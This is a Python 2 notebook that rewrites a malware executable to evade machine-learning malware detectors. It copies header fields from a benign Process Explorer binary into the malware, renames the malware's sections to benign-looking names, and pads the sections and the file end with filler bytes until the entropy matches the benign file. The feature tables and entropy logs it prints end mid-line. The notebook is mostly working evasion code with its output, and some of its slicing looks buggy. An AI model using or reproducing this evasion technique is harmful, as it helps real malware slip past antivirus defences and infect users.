In [13]:
import csv, os, pefile
import math
import array
import random
import pandas as pd

import extract

class Make_good():

    def __init__(self,benign,malware):

        header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\
                  'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\
                  'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\
                  'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\
                  'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] #,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']

        self.benign_path = benign
        self.malware_path = malware        
        self.total_list = pd.DataFrame(columns=header)

    def print_data(self, pe, clas):

        if clas == 1:
            msg = "Malware"
        else:
            msg = "Benign"

        dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)
        self.total_list.loc[len(self.total_list)] = dat

        
    def get_dos_data(self, pe):

        dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]
        self.total_list.append(dos_data)
        
        return dos_data

    def get_file_data(self, pe):

        seconds= pe.FILE_HEADER.TimeDateStamp
        creation_year = 1970 + ((int(seconds) / 86400) / 365)
        
        tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\
            pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\
            pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\
            pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\
            pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\
            pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\
            pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\
            pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\
            pe.FILE_HEADER.IMAGE_FILE_DLL,\
            pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\
            pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI
            ]
        
        
        file_data = [pe.FILE_HEADER.NumberOfSections, creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]
        
        return file_data

    def get_optional_data(self, pe):

        tmp = [
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF
            ]
        
        try:
            optional_data = [
                pe.OPTIONAL_HEADER.MajorLinkerVersion,\
                pe.OPTIONAL_HEADER.MinorLinkerVersion,\
                pe.OPTIONAL_HEADER.SizeOfCode,\
                pe.OPTIONAL_HEADER.SizeOfInitializedData,\
                pe.OPTIONAL_HEADER.SizeOfUninitializedData,\
                pe.OPTIONAL_HEADER.AddressOfEntryPoint,\
                pe.OPTIONAL_HEADER.BaseOfCode,\
                pe.OPTIONAL_HEADER.BaseOfData,\
                pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\
                pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\
                pe.OPTIONAL_HEADER.MajorImageVersion,\
                pe.OPTIONAL_HEADER.MinorImageVersion,\
                pe.OPTIONAL_HEADER.MajorSubsystemVersion,\
                pe.OPTIONAL_HEADER.MinorSubsystemVersion,\
                pe.OPTIONAL_HEADER.CheckSum,\
                pe.OPTIONAL_HEADER.Subsystem,
                pe.OPTIONAL_HEADER.SizeOfStackReserve,\
                pe.OPTIONAL_HEADER.SizeOfStackCommit,\
                pe.OPTIONAL_HEADER.SizeOfHeapReserve,\
                pe.OPTIONAL_HEADER.SizeOfHeapCommit,\
                int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\
                int(tmp[3]), int(tmp[4]), int(tmp[6])]

        except Exception, e:
            print e                
                                
        return optional_data       

        
    def write_dos_header(self, pe_b, pe_m):
        # total : 4
        pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp
        pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr
        pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc
        pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp
        
    def write_file_header(self, pe_b, pe_m): 
        # total : 5
        pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp
        pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED
        pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM =  pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM
        pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM 
        pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY 
        

    def write_optional_header(self, pe_b, pe_m):
        # total : 24
        pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion 
        pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion
        pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode 
        pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData
        pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData 
        pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode 
        pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData
        pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion
        pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion
        pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion
        pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion
        pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion
        pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion
        pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum
        pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem
        pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve
        pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit
        pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve
        pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit
        pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND =  pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER
        
        
    def write_extra_info(self, pe_b, pe_m):
        # total : 2
        benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']
        
        NumSection = pe_m.FILE_HEADER.NumberOfSections
        for i in range(0, NumSection):
            pe_m.sections[i].Name = benign_sections[i].encode()
        
    
    def get_start(self, mode):

        # get benign pe file with pefile 
        try:
            pe_benign = pefile.PE(self.benign_path)
        except Exception, e:
            print "{} while opening {}".format(e,self.benign_path)

        # get malware pe file with pefile 
        try:
            pe_malware = pefile.PE(self.malware_path)
        except Exception, e:
            print "{} while opening {}".format(e,self.malware_path)

        self.print_data(pe_benign, 0)
        self.print_data(pe_malware, 1)
        
        if mode == 1:
            self.write_dos_header(pe_benign, pe_malware)
            self.write_file_header(pe_benign, pe_malware)
            self.write_optional_header(pe_benign, pe_malware)
            self.write_extra_info(pe_benign, pe_malware)

            new_exe_path = "malware_.exe"
            pe_malware.write(new_exe_path)
            new_pe = pefile.PE(new_exe_path)
        
        return self.total_list


    

In [2]:
def cal_byteFrequency(byteArr,fileSize):
    freqList = []
    for b in range(256):
        ctr = 0
        for byte in byteArr:
            if byte == b:
                ctr += 1
        freqList.append(float(ctr) / fileSize)
    return freqList

def get_file_entropy(byteArr, fileSize):
    freqList = cal_byteFrequency(byteArr,fileSize)
    # Shannon entropy
    ent = 0.0
    for freq in freqList:
        if freq > 0:
            ent +=  - freq * math.log(freq, 2)
    return [fileSize,ent]

def get_text_data_entropy(pe):
    result=[0.0, 0.0]
    
    for section in pe.sections:
        s_name = section.Name.split('\x00')[0]
        if s_name == ".text":
            result[0]= section.get_entropy()
        elif s_name == ".data":
            result[1]= section.get_entropy()
        else:
            pass
    return result  

def get_file_bytes_size(filepath):
    f = open(filepath, "rb")
    byteArr = map(ord, f.read())
    f.close()
    fileSize = len(byteArr)
    return byteArr,fileSize


In [3]:
def write_text_entropy(ben, mal, loo):
    
    ben_pe = pefile.PE(ben)
    mal_pe = pefile.PE(mal)
    
    ben_en = get_text_data_entropy(ben_pe)
    mal_en = get_text_data_entropy(mal_pe)
    
    #print "[ entropy before ]", "\n ben: ",  ben_en[0], " mal: ", mal_en[0]
    #print "align: ", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), " ", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)
    
    insert_mul = loo
    text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul

    for section in mal_pe.sections:

        s_name = section.Name.split('\x00')[0]
        if s_name == ".text":
            start = section.PointerToRawData + section.SizeOfRawData
            section.SizeOfRawData += text_padding
            end = section.PointerToRawData + section.SizeOfRawData
        else:
            section.PointerToRawData += text_padding

        #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)

    mal_pe.write(after_t)
    mal_pe.__data__.close()
    bytearr, _ = get_file_bytes_size(after_t)
    
    if ben_en[0] > mal_en[0]:
        bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]
    else:
        bytearr[start:text_padding] = [0 for i in range(0, text_padding)]

    #print l, ar
    #print len(bytearr), bytearr[start:end]

    byte = array.array('B', bytearr).tostring()
    f = open(after_t, 'wb')
    f.write(byte)
    f.close()

    new_pe = pefile.PE(after_t)
    new_en = get_text_data_entropy(new_pe)
    bytearr, _ = get_file_bytes_size(after_t)
    #print bytearr[start:end], len(bytearr[start:end])

    diff = abs(new_en[0] - ben_en[0])
    print "* text section entropy :", mal_en[0], "->", new_en[0], " diff: ", diff

    return diff, new_en[0]


In [4]:
def write_data_entropy(ben, mal, loo):
    
    ben_pe = pefile.PE(ben)
    mal_pe = pefile.PE(mal)
    
    ben_en = get_text_data_entropy(ben_pe)
    mal_en = get_text_data_entropy(mal_pe)
    
    #print "[ entropy before ]", "\n ben: ",  ben_en[1], " mal: ", mal_en[1]
    #print "align: ", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), " ", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)
    
    insert_mul = loo
    text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul

    for section in mal_pe.sections:

        s_name = section.Name.split('\x00')[0]
        if s_name == ".data":
            start = section.PointerToRawData + section.SizeOfRawData
            section.SizeOfRawData += text_padding
            end = section.PointerToRawData + section.SizeOfRawData
        elif s_name != ".text" and s_name != ".data":
            section.PointerToRawData += text_padding

        #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)

    mal_pe.write(after_d)
    mal_pe.__data__.close()
    bytearr, _ = get_file_bytes_size(after_d)
    if ben_en[1] > mal_en[1]:
        bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]
    else:
        bytearr[start:text_padding] = [0 for i in range(0, text_padding)]

    #print l, ar
    #print len(bytearr), bytearr[start:end]

    byte = array.array('B', bytearr).tostring()
    f = open(after_d, 'wb')
    f.write(byte)
    f.close()

    new_pe = pefile.PE(after_d)
    new_en = get_text_data_entropy(new_pe)
    bytearr, _ = get_file_bytes_size(after_d)
    #print bytearr[start:end], len(bytearr[start:end])

    diff = abs(new_en[1] - ben_en[1])
    print "* data section entropy :", mal_en[1], "->", new_en[1], " diff: ", diff

    return diff, new_en[1]



In [5]:
def write_file_entropy(ben, mal):
    
    save = 0
    rns = 0
    
    ben_byte, ben_size = get_file_bytes_size(ben)
    mal_byte, mal_size = get_file_bytes_size(mal)

    _, ben_en = get_file_entropy(ben_byte, ben_size)
    _, mal_en = get_file_entropy(mal_byte, mal_size)
    
    
    diff_bak = 10.0
    
    print "File entropy before: ", ben_en, " ", mal_en, " diff_bak: ", diff_bak 
    
    
    for di in range(1, 100):
        
        if save:
            di = di -1
            
        bytearr = mal_byte
        append_size = 4096*di
        
        if ben_en < mal_en:
            appen = [0 for i in xrange(append_size)]
            bytearr.extend(appen)
        else:
            appen = [random.sample(range(255), 1)[0] for i in xrange(append_size)]
            bytearr.extend(appen)

        size, ent = get_file_entropy(bytearr, (mal_size + append_size))
        diff = abs(ben_en - ent)
        print "entropy after :", mal_en, " -> ", ent, " diff: ", diff

        if diff_bak < diff:
            save = 1

        else:
            diff_bak = diff
        
        if save:
            rns = ent
            byte = array.array('B', bytearr).tostring()
            f = open(final, 'wb')
            f.write(byte)
            f.close()
            break
            
    return rns


In [14]:
ben = 'procexp.exe'
mal = 'malware.exe'

pe = Make_good(ben, mal)
pd = pe.get_start(1)

print "[*] Before Crafting Malware Sample "
pd


[*] Before Crafting Malware Sample 


,e_cblp,e_cp,e_cparhdr,e_maxalloc,e_sp,e_lfanew,NumofSections,CreationYear,FH3_local_sym,FH4_ws_trim,...,Checksum,Subsystem,SReserve,SCommit,HReserve,HCommit,LoaderFlags,DLL3,DLL4,DLL6
0,144,3,4,65535,184,280,5,2017,0,0,...,2727685,2,1048576,4096,1048576,4096,1,0,0,0
1,80,2,4,65535,184,256,8,1992,1,0,...,684332,2,1048576,16384,1048576,4096,1,0,0,0


In [ ]:
mal = 'malware_.exe'
after_t = 'mal_t.exe'
after_d = 'mal_d.exe'
final = 'mal_new.exe'

count = 0
diff_bak = 10

for i in range(1, 10):
    diff, e = write_text_entropy(ben, mal, i) 
    if diff_bak > diff:
        diff_bak = diff
    else:
        count = i-1
        break

diff, e =write_text_entropy(ben, mal, count)

print "* Final Text Section Entropy : ", e

count = 0
diff_bak = 10

for i in range(1, 30):
    diff, f = write_data_entropy(ben, after_t, i) 
    if diff_bak > diff:
        diff_bak = diff
    else:
        count = i-1
        diff, f = write_data_entropy(ben, after_t, count)
        break

print "* Final Data Section Entropy : ", f


ent = write_file_entropy(ben, after_d)        
print "* Final File Entropy : ", ent


* text section entropy : 6.91707825321 -> 6.86794673205  diff:  0.390924178805
* text section entropy : 6.91707825321 -> 6.81787533455  diff:  0.340852781302
* text section entropy : 6.91707825321 -> 6.76718649884  diff:  0.290163945591
* text section entropy : 6.91707825321 -> 6.71612682881  diff:  0.239104275563
* text section entropy : 6.91707825321 -> 6.66488842358  diff:  0.187865870337
* text section entropy : 6.91707825321 -> 6.61362299274  diff:  0.13660043949
* text section entropy : 6.91707825321 -> 6.56245157824  diff:  0.0854290249906
* text section entropy : 6.91707825321 -> 6.51147147146  diff:  0.0344489182086
* text section entropy : 6.91707825321 -> 6.4607612684  diff:  0.0162612848483
* text section entropy : 6.91707825321 -> 6.91707825321  diff:  0.440055699968
* Final Text Section Entropy :  6.91707825321
* data section entropy : 0.0 -> 7.54211511009  diff:  4.84998295094
* data section entropy : 0.0 -> 7.79379731287  diff:  5.10166515371
* data section entropy : 0.